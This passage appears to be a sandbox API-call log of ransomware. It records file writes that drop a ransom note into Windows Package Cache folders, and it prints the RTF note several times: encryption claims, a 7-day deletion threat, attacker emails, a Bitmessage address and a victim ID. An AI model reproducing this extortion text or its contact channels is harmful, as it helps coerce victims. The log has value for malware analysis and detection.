\\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0262.858] WriteFile (in: hFile=0x27c, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0262.859] CloseHandle (hObject=0x27c) returned 1 [0262.859] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\#readme_eman#.rtf")) returned 0x20 [0262.859] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\#readme_eman#.rtf")) returned 0xffffffff [0262.859] GetLastError () returned 0x2 [0262.859] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0265.707] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0265.707] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0265.707] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x38bbe68, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your 